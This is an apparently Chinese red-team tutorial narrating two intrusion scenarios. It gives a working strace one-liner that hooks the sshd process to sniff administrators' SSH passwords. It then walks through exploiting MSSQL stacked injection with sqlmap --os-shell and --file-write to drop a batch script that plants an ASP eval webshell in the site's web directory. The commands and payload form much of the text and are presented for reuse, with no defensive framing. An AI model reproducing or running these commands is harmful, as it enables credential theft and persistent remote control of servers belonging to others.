假设一个攻击场景：

你的入口机器是一台Linux，并且发现所处C段大部分为Linux，此时也提权至root了，对于其他网段而言，你必须跨出你所在的C段才能跨到别的地址段去（这是一台业务服务器，站库分离，通过检索配置文件可以拿到数据库权限，但是Mysql，并未多少利用点）。

你想起了可以尝试用MimiPenguin抓取密码？奈何密码没抓到。

通过长期的蹲点，你发现业务管理员每周五下午会定时登录一次，有时早，有时晚（可能是人工巡检，也可能是脚本登录）？

此时你想或许可以尝试监听管理员的密码？很快，你想起了strace命令可以监听一手密码

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &)grep -E 'read(6, ".+\0\0\0\.+"' /tmp/sshd.log

很幸运，你在这周五管理员上线的时候，捕获到了密码：

接下来，你发现这个C段的IP全部是通用密码，很轻松突破了隔离网段。

某次演练：

【09:00:10】你运气不错，开局就是一枚mssql 堆叠注入！

【09:00:40】你掏出你的珍藏sqlmap开始梭哈：

【09:02:10】你看到权限是dba，果断的尝试--os-shell执行命令。

【09:03:10】你运气很好，成功的执行出了命令，但是很快你笑不出来了，你发现虽然可以执行命令，但是TCP/UDP均不出网。

【09:05:10】你心想：不出网又怎样，我写webshell总行吧，开梭，于是飞速敲下一条命令：

【09:05:40】你很快定位到了web目录，但是WEB目录是中文目录，你尝试写入，但是写入失败了。

【09:06:20】你开始冥思苦想......一千年Later......

【09:08:10】你开始百度，你发现可以通过sqlmap上传写好的bat脚本，把webshell写入web目录：

python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:userspublicmusicashell.bat

ashell.bat的内容

echo ^<%%eval request("aaaaaa")%%^> >D:\张三的马赛克\Content\images\logo1.asp

【09:08:30】你再次执行os-shell，此时你惊喜的发现bat已经落地，你执行了ashell.bat，返回为空，证明执行成功。

【09:08:31】你怀揣着激动的心情访问了webshell地址，惊喜的发现webshell写入成功！